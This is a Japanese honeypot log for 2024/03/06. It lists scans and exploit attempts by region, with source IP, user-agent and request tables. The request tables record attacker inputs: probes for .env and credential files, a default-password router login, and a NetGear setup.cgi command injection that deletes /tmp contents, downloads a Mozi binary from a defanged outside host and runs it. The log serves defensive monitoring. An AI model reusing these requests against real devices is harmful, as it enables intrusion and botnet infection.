ハニーポット(仮) 観測記録 2024/03/06分です。
特徴
共通
fasthttpによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
configファイルへのスキャン行為
を確認しました。
Location:US
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
を確認しました。
Location:SG
Amcrest Deviceの脆弱性(CVE-2017-8226)を狙うアクセス
Cisco Unified Operations Managerの脆弱性(CVE-2011-0966)を狙うアクセス
Cute Editorの脆弱性(CVE-2009-4665)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Easy Hosting Control Panelの脆弱性を狙うアクセス
FCKEditorの脆弱性を狙うアクセス
Joomla!の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Sun/Oracle GlassFish Serverの脆弱性(CVE-2011-0807)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
Apache Tomcatへのスキャン行為
Sun/Oracle GlassFish Serverへのスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:79 (前日比:10)
US:総アクセス数:90 (前日比:-18)
UK:総アクセス数:95 (前日比:2)
SG:総アクセス数:2300 (前日比:2217)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 35.205.163.212 | United States |
1 | 45.33.80.243 | United States |
1 | 45.56.108.128 | United States |
1 | 85.215.118.152 | Germany |
1 | 91.92.245.67 | Bulgaria |
1 | 94.156.69.247 | Bulgaria |
15 | 101.32.192.203 | Singapore |
1 | 102.129.252.157 | South Africa |
2 | 104.238.221.228 | United States |
9 | 135.125.217.54 | France |
7 | 135.125.246.110 | France |
1 | 137.184.108.66 | United States |
1 | 139.162.43.37 | Netherlands |
3 | 139.162.43.75 | Netherlands |
1 | 149.102.242.166 | United States |
4 | 165.227.194.115 | United States |
1 | 170.64.201.71 | United States |
1 | 172.104.242.173 | United States |
1 | 184.105.247.195 | United States |
2 | 185.165.169.131 | Seychelles |
1 | 185.180.143.6 | Portugal |
1 | 185.198.69.27 | Russia |
4 | 185.254.196.173 | Ukraine |
2 | 185.254.196.186 | Ukraine |
1 | 188.166.151.2 | United States |
1 | 190.109.229.43 | Bolivia |
2 | 193.32.162.87 | Romania |
2 | 198.235.24.146 | United States |
2 | 205.210.31.86 | United States |
8 | 210.152.112.7 | Japan |
UserAgent一覧
件数 | UserAgent |
---|---|
17 | - |
1 | Go-http-client/1.1 |
1 | MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0 |
1 | Mozilla/5.0 (Linux; Android 10; BLA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/14.7 |
1 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 |
15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | fasthttp |
1 | python-requests/2.25.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 |
||
1 | \x16\x03\x01\x01\xfa\x01 |
||
12 | \x16\x03\x01 |
||
1 | help |
||
1 | CONNECT | api[.]ipify[.]org:443 |
HTTP/1.1 |
25 | GET | /.env |
HTTP/1.1 |
3 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /0bef |
HTTP/1.0 |
1 | GET | /Z30ZpX0NTG |
HTTP/1.1 |
1 | GET | /app/config/parameters.yml.dist |
HTTP/1.1 |
1 | GET | /app/config/parameters.yml |
HTTP/1.1 |
1 | GET | /cgi-bin/authLogin.cgi |
HTTP/1.1 |
1 | GET | /config.json |
HTTP/1.1 |
1 | GET | /config/config.json |
HTTP/1.1 |
1 | GET | /config/default.json |
HTTP/1.1 |
1 | GET | /credentials/config.json |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /hax?jsp=/app/rest/server;.jsp |
HTTP/1.1 |
1 | GET | /parameters.yml.dist |
HTTP/1.1 |
1 | GET | /parameters.yml |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
2 | GET | /wap/Login/login |
HTTP/1.1 |
1 | HEAD | /.env |
HTTP/1.1 |
15 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /app/rest/users/id:1/tokens/RPC2 |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 34.76.130.201 | United States |
8 | 41.230.26.9 | Tunisia |
3 | 43.153.31.180 | Singapore |
1 | 45.79.181.179 | United States |
1 | 45.79.181.251 | United States |
1 | 45.227.254.49 | Belize |
1 | 52.80.126.145 | China |
1 | 52.80.177.122 | China |
1 | 52.226.166.103 | United States |
7 | 54.36.115.221 | France |
6 | 57.129.23.166 | France |
1 | 65.49.1.103 | United States |
3 | 65.49.20.68 | United States |
2 | 78.153.140.175 | Russia |
2 | 83.97.73.245 | Germany |
1 | 83.147.55.55 | Spain |
2 | 85.215.118.152 | Germany |
8 | 95.214.235.169 | Ukraine |
1 | 137.184.34.187 | United States |
1 | 139.59.101.104 | Singapore |
4 | 143.198.140.60 | United States |
4 | 143.198.214.253 | United States |
2 | 162.142.125.11 | United States |
2 | 162.142.125.213 | United States |
4 | 164.52.0.94 | China |
2 | 167.94.146.55 | United States |
1 | 167.172.50.84 | United States |
1 | 170.64.141.97 | United States |
1 | 172.96.161.103 | United States |
1 | 172.105.128.12 | United States |
1 | 172.105.128.13 | United States |
3 | 185.165.169.131 | Seychelles |
1 | 185.166.84.146 | India |
1 | 185.180.143.71 | Portugal |
1 | 192.155.90.118 | United States |
1 | 192.155.90.220 | United States |
1 | 192.241.222.99 | United States |
1 | 192.241.225.76 | United States |
2 | 198.235.24.78 | United States |
2 | 198.235.24.133 | United States |
2 | 205.210.31.254 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
29 | - |
2 | Go-http-client/1.1 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 |
1 | Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0 |
1 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 |
23 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) CriOS/64.0.3282.112 Mobile/14G60 Safari/602.1 |
2 | Mozilla/5.0 zgrab/0.x |
3 | Mozilla/5.0 |
3 | fasthttp |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
2 | \x16\x03\x01\x01\x04\x01 |
||
1 | \x16\x03\x01\x01\xfb\x01 |
||
3 | \x16\x03\x01\x02 |
||
17 | \x16\x03\x01 |
||
25 | GET | /.env |
HTTP/1.1 |
5 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.vscode/sftp.json |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/authLogin.cgi |
HTTP/1.1 |
8 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /hax?jsp=/app/rest/server;.jsp |
HTTP/1.1 |
2 | GET | /hello |
HTTP/1.1 |
1 | GET | /invoker/readonly |
HTTP/1.1 |
1 | GET | /k6cvIxkEMB |
HTTP/1.1 |
1 | GET | /login |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /script |
HTTP/1.1 |
1 | GET | /users/sign_in |
HTTP/1.1 |
1 | GET | /wap/Login/login |
HTTP/1.1 |
1 | GET | /webui/ |
HTTP/1.1 |
1 | GET | /wp-login.php |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.0 |
1 | POST | /_ignition/execute-solution |
HTTP/1.1 |
1 | POST | /app/rest/users/id:1/tokens/RPC2 |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
3 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 27.215.183.239 | China |
1 | 34.76.1.132 | United States |
1 | 38.68.46.66 | United States |
2 | 45.79.181.223 | United States |
1 | 45.79.181.251 | United States |
1 | 45.128.232.144 | Bulgaria |
2 | 51.159.214.48 | France |
3 | 54.37.79.75 | France |
14 | 57.129.23.166 | France |
1 | 65.49.1.96 | United States |
1 | 65.49.1.100 | United States |
1 | 65.49.1.106 | United States |
2 | 83.97.73.245 | Germany |
1 | 89.23.107.116 | Russia |
2 | 94.156.69.247 | Bulgaria |
8 | 95.214.235.169 | Ukraine |
1 | 103.42.243.2 | private ip address |
1 | 109.199.96.132 | Bulgaria |
7 | 118.123.105.85 | China |
13 | 138.68.48.145 | United States |
1 | 139.59.101.104 | Singapore |
1 | 144.126.225.26 | United States |
1 | 146.70.15.26 | Romania |
1 | 149.50.105.76 | United States |
13 | 165.227.189.216 | United States |
2 | 167.94.145.52 | United States |
1 | 172.104.11.46 | United States |
1 | 184.105.139.67 | United States |
4 | 185.165.169.131 | Seychelles |
1 | 185.180.143.136 | Portugal |
1 | 192.155.90.118 | United States |
2 | 205.210.31.142 | United States |
2 | 205.210.31.225 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
28 | - |
1 | Facebot |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 (Linux; Android 9; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 |
26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
3 | Mozilla/5.0 |
1 | curl/7.81.0 |
2 | curl/8.1.2 |
1 | fasthttp |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01\x01\xfc\x01 |
||
23 | \x16\x03\x01 |
||
1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
30 | GET | /.env |
HTTP/1.1 |
3 | GET | /.git/config |
HTTP/1.1 |
2 | GET | /1.php |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
2 | GET | /bundle.js |
HTTP/1.1 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/authLogin.cgi |
HTTP/1.1 |
1 | GET | /cgi/conf.bin |
HTTP/1.1 |
5 | GET | /favicon.ico |
HTTP/1.1 |
2 | GET | /files/ |
HTTP/1.1 |
2 | GET | /form.html |
HTTP/1.1 |
2 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
2 | GET | /info.php |
HTTP/1.1 |
2 | GET | /password.php |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]215[.]183[.]239:54253/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
2 | GET | /systembc/password.php |
HTTP/1.1 |
2 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /webui/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /app/rest/users/id:1/tokens/RPC2 |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |